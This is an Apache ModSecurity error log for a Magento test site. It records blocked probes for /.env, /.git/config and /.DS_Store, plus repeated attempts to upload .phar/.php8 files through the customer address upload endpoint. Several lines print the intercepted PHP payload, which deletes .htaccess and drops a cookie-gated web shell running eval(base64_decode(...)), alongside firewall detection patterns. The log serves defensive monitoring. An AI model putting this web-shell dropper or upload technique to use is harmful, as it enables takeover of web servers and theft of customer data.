[Fri Dec 26 05:58:30.148774 2025] [:error] [pid 987016] [client 157.230.19.140:35200] [client 157.230.19.140] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aU4V9vtV0DSD9Vsv4Ep7NAAAAAE"]
[Fri Dec 26 05:58:32.149989 2025] [:error] [pid 987015] [client 157.230.19.140:35206] [client 157.230.19.140] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aU4V-Ek2h_39dq1WaM9c8wAAAAA"]
[Fri Dec 26 05:58:32.150223 2025] [:error] [pid 987015] [client 157.230.19.140:35206] [client 157.230.19.140] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aU4V-Ek2h_39dq1WaM9c8wAAAAA"]
[Fri Dec 26 05:58:32.150404 2025] [:error] [pid 987015] [client 157.230.19.140:35206] [client 157.230.19.140] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aU4V-Ek2h_39dq1WaM9c8wAAAAA"]
[Fri Dec 26 06:48:25.444795 2025] [:error] [pid 987016] [client 194.110.207.198:41030] [client 194.110.207.198] ModSecurity: Rule 7f2a993c1be8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/x/w/xw88364f428d25.phar"] [unique_id "aU4hqftV0DSD9Vsv4Ep7UAAAAAE"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Fri Dec 26 06:48:25.445264 2025] [:error] [pid 987016] [client 194.110.207.198:41030] [client 194.110.207.198] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/x/w/xw88364f428d25.phar"] [unique_id "aU4hqftV0DSD9Vsv4Ep7UAAAAAE"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Fri Dec 26 06:48:25.447576 2025] [:error] [pid 987016] [client 194.110.207.198:41030] [client 194.110.207.198] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/x/w/xw88364f428d25.phar"] [unique_id "aU4hqftV0DSD9Vsv4Ep7UAAAAAE"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Fri Dec 26 06:48:25.447755 2025] [:error] [pid 987016] [client 194.110.207.198:41030] [client 194.110.207.198] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/x/w/xw88364f428d25.phar"] [unique_id "aU4hqftV0DSD9Vsv4Ep7UAAAAAE"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Fri Dec 26 06:48:26.966104 2025] [:error] [pid 987016] [client 194.110.207.198:41030] [client 194.110.207.198] ModSecurity: Warning. Pattern match ".*\\\\.(?:php\\\\d*|phtml)\\\\.*$" at FILES:custom_attributes[country_id]. [file "/usr/share/modsecurity-crs/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "109"] [id "933110"] [msg "PHP Injection Attack: PHP Script File Upload Found"] [data "Matched Data: xw88364f428d25.php8 found within FILES:custom_attributes[country_id]: xw88364f428d25.php8"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-injection-php"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aU4hqvtV0DSD9Vsv4Ep7UQAAAAE"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/x/w/xw88364f428d25.phar
[Fri Dec 26 06:48:26.966795 2025] [:error] [pid 987016] [client 194.110.207.198:41030] [client 194.110.207.198] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aU4hqvtV0DSD9Vsv4Ep7UQAAAAE"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/x/w/xw88364f428d25.phar
[Fri Dec 26 06:48:26.966972 2025] [:error] [pid 987016] [client 194.110.207.198:41030] [client 194.110.207.198] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=5,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aU4hqvtV0DSD9Vsv4Ep7UQAAAAE"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/x/w/xw88364f428d25.phar
[Fri Dec 26 06:48:27.251361 2025] [:error] [pid 987016] [client 194.110.207.198:41030] [client 194.110.207.198] ModSecurity: Rule 7f2a993c1be8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/x/w/xw88364f428d25.php8"] [unique_id "aU4hq_tV0DSD9Vsv4Ep7UgAAAAE"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Fri Dec 26 06:48:27.251802 2025] [:error] [pid 987016] [client 194.110.207.198:41030] [client 194.110.207.198] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/x/w/xw88364f428d25.php8"] [unique_id "aU4hq_tV0DSD9Vsv4Ep7UgAAAAE"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Fri Dec 26 06:48:27.254047 2025] [:error] [pid 987016] [client 194.110.207.198:41030] [client 194.110.207.198] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/x/w/xw88364f428d25.php8"] [unique_id "aU4hq_tV0DSD9Vsv4Ep7UgAAAAE"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Fri Dec 26 06:48:27.254244 2025] [:error] [pid 987016] [client 194.110.207.198:41030] [client 194.110.207.198] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/x/w/xw88364f428d25.php8"] [unique_id "aU4hq_tV0DSD9Vsv4Ep7UgAAAAE"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Fri Dec 26 09:05:33.824487 2025] [authz_core:error] [pid 987021] [client 146.190.103.103:55600] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/server-status
[Fri Dec 26 09:05:36.885360 2025] [:error] [pid 991182] [client 146.190.103.103:33086] [client 146.190.103.103] ModSecurity: Warning. Matched phrase "/.DS_Store" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.DS_Store found within REQUEST_FILENAME: /.ds_store"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aU5B0CG2j9LQ8lcF75-6_gAAAA8"]
[Fri Dec 26 09:05:36.886189 2025] [:error] [pid 991182] [client 146.190.103.103:33086] [client 146.190.103.103] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aU5B0CG2j9LQ8lcF75-6_gAAAA8"]
[Fri Dec 26 09:05:36.886372 2025] [:error] [pid 991182] [client 146.190.103.103:33086] [client 146.190.103.103] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aU5B0CG2j9LQ8lcF75-6_gAAAA8"]
[Fri Dec 26 09:05:37.892270 2025] [:error] [pid 987016] [client 146.190.103.103:33090] [client 146.190.103.103] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aU5B0ftV0DSD9Vsv4Ep7aQAAAAE"]
[Fri Dec 26 09:05:37.892625 2025] [:error] [pid 987016] [client 146.190.103.103:33090] [client 146.190.103.103] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aU5B0ftV0DSD9Vsv4Ep7aQAAAAE"]
[Fri Dec 26 09:05:37.892833 2025] [:error] [pid 987016] [client 146.190.103.103:33090] [client 146.190.103.103] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aU5B0ftV0DSD9Vsv4Ep7aQAAAAE"]
[Fri Dec 26 09:05:41.604121 2025] [:error] [pid 987019] [client 146.190.103.103:33092] [client 146.190.103.103] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aU5B1YcIx3ZiQjAH6pgJYQAAAAQ"]
[Fri Dec 26 09:05:41.604367 2025] [:error] [pid 987019] [client 146.190.103.103:33092] [client 146.190.103.103] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aU5B1YcIx3ZiQjAH6pgJYQAAAAQ"]
[Fri Dec 26 09:05:41.604523 2025] [:error] [pid 987019] [client 146.190.103.103:33092] [client 146.190.103.103] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aU5B1YcIx3ZiQjAH6pgJYQAAAAQ"]
[Sat Dec 27 00:50:20.213552 2025] [:error] [pid 1006518] [client 5.164.136.65:47800] [client 5.164.136.65] ModSecurity: Rule 7f2a99ef7be8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/f/h/fh88364f428d25.phar"] [unique_id "aU8fPEjVkgsIvBjzRKqCAgAAAAY"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sat Dec 27 00:50:20.214066 2025] [:error] [pid 1006518] [client 5.164.136.65:47800] [client 5.164.136.65] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/f/h/fh88364f428d25.phar"] [unique_id "aU8fPEjVkgsIvBjzRKqCAgAAAAY"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sat Dec 27 00:50:20.216518 2025] [:error] [pid 1006518] [client 5.164.136.65:47800] [client 5.164.136.65] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/f/h/fh88364f428d25.phar"] [unique_id "aU8fPEjVkgsIvBjzRKqCAgAAAAY"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sat Dec 27 00:50:20.216708 2025] [:error] [pid 1006518] [client 5.164.136.65:47800] [client 5.164.136.65] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/f/h/fh88364f428d25.phar"] [unique_id "aU8fPEjVkgsIvBjzRKqCAgAAAAY"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sat Dec 27 00:50:20.468907 2025] [:error] [pid 1006518] [client 5.164.136.65:47800] [client 5.164.136.65] ModSecurity: Warning. Pattern match ".*\\\\.(?:php\\\\d*|phtml)\\\\.*$" at FILES:custom_attributes[country_id]. [file "/usr/share/modsecurity-crs/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "109"] [id "933110"] [msg "PHP Injection Attack: PHP Script File Upload Found"] [data "Matched Data: fh88364f428d25.php8 found within FILES:custom_attributes[country_id]: fh88364f428d25.php8"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-injection-php"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aU8fPEjVkgsIvBjzRKqCAwAAAAY"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/f/h/fh88364f428d25.phar
[Sat Dec 27 00:50:20.469585 2025] [:error] [pid 1006518] [client 5.164.136.65:47800] [client 5.164.136.65] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aU8fPEjVkgsIvBjzRKqCAwAAAAY"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/f/h/fh88364f428d25.phar
[Sat Dec 27 00:50:20.469779 2025] [:error] [pid 1006518] [client 5.164.136.65:47800] [client 5.164.136.65] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=5,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aU8fPEjVkgsIvBjzRKqCAwAAAAY"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/f/h/fh88364f428d25.phar
[Sat Dec 27 00:50:21.099237 2025] [:error] [pid 1006518] [client 5.164.136.65:47800] [client 5.164.136.65] ModSecurity: Rule 7f2a99ef7be8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/f/h/fh88364f428d25.php8"] [unique_id "aU8fPUjVkgsIvBjzRKqCBAAAAAY"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sat Dec 27 00:50:21.099719 2025] [:error] [pid 1006518] [client 5.164.136.65:47800] [client 5.164.136.65] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/f/h/fh88364f428d25.php8"] [unique_id "aU8fPUjVkgsIvBjzRKqCBAAAAAY"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sat Dec 27 00:50:21.102067 2025] [:error] [pid 1006518] [client 5.164.136.65:47800] [client 5.164.136.65] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/f/h/fh88364f428d25.php8"] [unique_id "aU8fPUjVkgsIvBjzRKqCBAAAAAY"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
